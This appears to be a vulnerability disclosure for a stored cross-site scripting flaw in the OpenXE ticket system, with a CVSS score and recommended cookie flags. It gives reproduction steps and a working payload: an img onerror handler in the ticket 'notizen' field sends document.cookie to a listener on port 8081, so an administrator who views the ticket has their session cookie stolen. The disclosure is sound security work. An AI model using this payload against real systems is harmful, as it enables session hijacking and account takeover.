https://github.com/OpenXE-org/OpenXE
Set up the project. Fast and easy via Docker: OpenXE Docker
Login using any user that has access to create a ticket.
Set up a remote web server to accept requests.
Example:
python3 -m http.server 8081
In the notizen
field of a new ticket, insert any text along with the following payload:
<img src="http://url.to.file.which/not.exist" onerror=window.open("http://127.0.0.1:8081/?cookie="+document.cookie,"xss",'height=500,width=500');>
When a higher-privileged user opens the ticket overview, their browser will send a request to the provided URL with cookies, potentially leading to session hijacking.
The web application is vulnerable to XSS attacks. Attackers can exploit this vulnerability by injecting malicious scripts, stealing session cookies (if security flags are not properly configured), and potentially hijacking user sessions.
CVSS Score: 8.0 (High)
HttpOnly
, Secure
, SameSite=Strict
).User with low privilege created a ticket:
Ticket overview - this will trigger the payload:
Cookies received by attacker:
Version: